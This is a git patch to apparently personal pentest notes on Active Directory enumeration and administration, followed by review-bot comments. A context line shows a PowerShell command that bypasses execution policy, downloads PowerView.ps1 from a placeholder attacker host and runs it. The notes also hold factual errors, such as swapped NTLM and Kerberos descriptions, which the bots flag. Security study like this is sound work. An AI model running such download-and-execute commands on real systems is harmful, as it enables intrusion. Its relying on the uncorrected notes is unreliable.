From cf50085db371d2fd0cbe56cf1d6a58a34304c6f4 Mon Sep 17 00:00:00 2001 From: whx Date: Sat, 27 Aug 2022 00:43:09 +0200 Subject: [PATCH] modified AD --- misc/active_directory/active_directory.md | 102 ++++++++++++++++--- misc/active_directory/ad_misconfiguration.md | 2 +- 2 files changed, 89 insertions(+), 15 deletions(-) diff --git a/misc/active_directory/active_directory.md b/misc/active_directory/active_directory.md index df0854a..a434dde 100644 --- a/misc/active_directory/active_directory.md +++ b/misc/active_directory/active_directory.md @@ -1,25 +1,28 @@ # Active Directory Enumeration +* Offers authentication in the form of centralized __IAM__ a.k.a __SSO__ and authentication via __Policy Management__ +* There are user accounts acting on machine accounts (services), in general + * Consists of - * Domain Controller - * Organizational Units - * Users + * __Domain Controller__ + * __Organizational Units__, (security principals) can be common user or machine accounts + * Users * Groups - * Trusts - * AD Domains - * AD Forest - * Policies + * __Trusts__ + * __AD Domains__ + * __AD Forest__ + * __Policies__ * Administrative accounts are - * Domain Admin - * Enterprise Admin - * Schema Admin - * Server Operator - * Account Operator + * __Domain Admin__ + * __Enterprise Admin__ + * __Schema Admin__ + * __Server Operator__ + * __Account Operator__ ## Domain Controller -* AD Domain Services data store +* AD Domain Services (AD DS) data store stores all objects on the network * Authentication and authorization * Update replication / sync with other domain controllers in the forest * Administration of domain resources @@ -32,6 +35,8 @@ ### Forest +Consists of the following objects + * __Trees__, hierarchy of domains in the AD Domain Services * __Domains__, groups of objects * __Organizational Units (OU)__, containers of objects such as groups, users, printers and other resources 
@@ -47,6 +52,25 @@ * __Local Admin__, administrative persmission on an object but not the DC * __Domain Users__, average user account on a local machine which may have admin permissions +* __Machine users__, + * Machine accounts have local administrational permissions + * Can be recognized by a `$` at the end of the ID + * Their passwords are rotated on a schedule + * Passwords are 120 characters long per default + +### Security Groups + +Important groups are the following + +* __Domain Controllers__, every DC in the domain +* __Domain Admins__, dc access +* __Server Operators__, administration of domain controllers but not groups +* __Backup Operators__, full read access to any file +* __Account Operators__, able to provision accounts +* __Domain Users__, every user account in the domain +* __Domain Computers__, every machine account in the domain + +* [Security Groups doc](https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-security-groups) ### Policies @@ -67,7 +91,8 @@ * __NTLM__, ticket granting service * __Kerberos__, challenge/response via hashes -## Usage + +## Enumration * Cmdlets on Domain Controller * Get some help, `Get-Help Get-Command -Examples`, `Get-Command Get-*` 
@@ -110,3 +135,52 @@ ls -d powershell -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://%ATTACKER_IP%:8000/PowerVi ew.ps1'); Get-NetUser | select samaccountname, description" ``` + +## Configuration + +### Configure Users and Groups + +* Use Start -> "Active Directory and Computers" to provision AD objects via __organizational units (OU)__ +* A set of users as a group with set policies are defined as __organizational unit (OU)__ +* A user is unique to a single OU + +* Default OUs are the following + * __Builtin__ + * __Users__, user accounts + * __Computers__, machine accounts + * __Domain Controllers__, contains DC in the domain + * __Managed Service Accounts__, service accounts in the domain + +* To __delete__ a OU use `View` -> `Advanced Features`. Properties menu of the OU via right click shows the checkbox `Protect object from accidental deletion` under `Object` tab -> uncheck it and delete the OU afterwards + +* To __delegate__ open properties with right click -> `Next` -> `Delegate Control` -> `Add` -> Choose user and OK -> `Next` -> Choose tasks to delegate -> `Next` -> `Finish` + +* To __change__ a user password via powershell +```sh +Set-ADAccountPassword -Reset -NewPassword (Read-Host -AsSecureString -Prompt 'New Password') -Verbose +``` +* To let the user __change__ the password at the next login +```sh +Set-ADUser -ChangePasswordAtLogon $true -Identity -Verbose +``` + +### Managing Machine Users + +* `Computer` OU should be split into at least `Workstations` and `Servers` + +### Group Policies + +* __Group Policy Objects__ are applied to OUs + +* Use the application `Group Policy Management` to apply policies to UOs +* GPOs under `Group Policy Objects` for the specific domain can be modified. These will be inherited to all UOs. 
You can see the links to the OUs on the right hand site if you click the GPO on the left +* Child OUs inherit the policies from parent UOs +* `Security Filters` can be set as well here +* The `Settings` tab of a policy shows its actual content +* Right click on a Policy -> `Edit` to change the content of the policy. There are templates for multiple common policies + +* `SYSVOL` as a SMB share is used to distribute the GPOs in the domain, it maps to `C:\Windows\SYSVOL\sysvol\` on the domain controller +* To force an update of changed policies across the domain do +```sh +gpupdate /force +``` diff --git a/misc/active_directory/ad_misconfiguration.md b/misc/active_directory/ad_misconfiguration.md index 5f91fe5..1ca3427 100644 --- a/misc/active_directory/ad_misconfiguration.md +++ b/misc/active_directory/ad_misconfiguration.md @@ -35,7 +35,7 @@ Add-GroupMember "" -Members "" Get-ADGroupMember -Identity "" ``` -* Set new password for user, afterwards reconnect session +* __Set new password for user__, afterwards reconnect session ```sh $Password = ConvertTo-SecureString "password123#" -AsPlainText -Force Set-ADAccountPassword -Identity "" -Reset -NewPassword $Password
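Review bot: In the first hunk of active_directory.md (`@@ -1,25 +1,28 @@`), the line `__Organizational Units__, (security principals) can be common user or machine accounts` conflates two different things: an OU is a container used to group objects for delegation and Group Policy linking, and it is not itself a security principal; the security principals are the users, computers and groups, which already have their own bullets. Suggest `* __Organizational Units__, containers of objects (users, groups, machines) used for delegation and policy` and moving the security-principal remark next to the Users/Groups bullets. The new first bullet also presents IAM and SSO as synonyms and files Policy Management under authentication; Group Policy governs configuration and authorization rather than authentication, so "authorization via Policy Management" would be more accurate. Minor style point: `Users` is the only sibling left unbolded.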
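Review bot: In the `@@ -47,6 +52,25 @@` hunk, the blank line inserted before `+* [Security Groups doc](...)` splits that link off into a separate list from the groups above it; drop the blank line. `administrational permissions` should read `administrative permissions`. Two of the group descriptions are misleading: `__Domain Admins__, dc access` undersells the group, since members are local administrators on every domain-joined machine, not only on the DCs, and `__Backup Operators__, full read access to any file` is really the right to back up and restore files regardless of their ACLs, which includes writing them back, so it should be described as bypassing file permissions rather than read-only. For the machine account bullets, "rotated on a schedule" could state the default interval of 30 days, which is the value a reader will want when reasoning about stale machine accounts.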
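Review bot: In the `@@ -67,7 +91,8 @@` hunk the new heading `+## Enumration` is misspelled; it should be `## Enumeration`. While this hunk is touching the lines directly below them, the unchanged context lines `__NTLM__, ticket granting service` and `__Kerberos__, challenge/response via hashes` have their descriptions swapped: Kerberos is the ticket-based protocol (TGT and TGS) and NTLM is the hash-based challenge/response, so fixing both in the same commit would be worthwhile.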
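Review bot: In the `@@ -110,3 +135,52 @@` hunk two of the added PowerShell snippets will not run as written: `Set-ADAccountPassword -Reset -NewPassword (Read-Host -AsSecureString -Prompt 'New Password') -Verbose` names no account, and `Set-ADUser -ChangePasswordAtLogon $true -Identity -Verbose` gives `-Identity` no value, so PowerShell reports a missing argument. Suggest a visible placeholder, e.g. `Set-ADAccountPassword -Identity "<username>" -Reset -NewPassword (Read-Host -AsSecureString -Prompt 'New Password') -Verbose` and `Set-ADUser -Identity "<username>" -ChangePasswordAtLogon $true -Verbose`. The fences are tagged `sh` although the contents are PowerShell (`Set-AD*`, `gpupdate`); `powershell` is the correct tag. Text fixes in the same hunk: the snap-in is "Active Directory Users and Computers", not "Active Directory and Computers"; `UOs` appears four times and should be `OUs`; `a OU` should be `an OU`; `right hand site` should be `right hand side`; and the `Computer` OU under Managing Machine Users is listed as `Computers` in the default OU list just above it. The sentence `A set of users as a group with set policies are defined as __organizational unit (OU)__` also mixes groups and OUs and is easier to read as "An OU groups objects so that policies and delegation can be applied to them together".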
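Review bot: In the ad_misconfiguration.md hunk (`@@ -35,7 +35,7 @@`) only the bolding changes, but the visible context line `Add-GroupMember "" -Members ""` is not a cmdlet of the ActiveDirectory module; the cmdlet is `Add-ADGroupMember -Identity "" -Members ""`, matching the `Get-ADGroupMember -Identity ""` line that follows it. As in the other file, the fence is tagged `sh` around PowerShell and should be `powershell`.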